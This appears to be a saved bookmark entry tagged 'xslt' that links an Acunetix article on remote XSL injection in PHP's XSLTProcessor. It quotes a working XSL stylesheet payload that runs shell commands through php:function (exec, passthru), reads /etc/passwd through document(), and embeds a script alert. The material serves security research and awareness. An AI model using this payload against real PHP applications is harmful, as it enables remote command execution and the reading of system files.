1 result tagged xslt
  • The hidden dangers of XSLTProcessor - Remote XSL injection | Acunetix
    <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
      <xsl:template match="/">
      <script>confirm("We're good");</script>
       <!--
       <xsl:value-of select="php:function('exec','id')"/>
       <xsl:value-of select="php:function(‘passthru’,’ls -la /’)"/>
       <xsl:copy-of select="document('/etc/passwd')"/>
       <xsl:value-of select="php:function('passthru','ls -la /')"/>
       -->
       <xsl:value-of select="php:function('passthru','ls -la /')"/>
    
      </xsl:template>
    </xsl:stylesheet>
    October 16, 2020 at 3:57:50 PM UTC
    - https://www.acunetix.com/blog/articles/the-hidden-dangers-of-xsltprocessor-remote-xsl-injection/
    xslt injection command execution rce lfi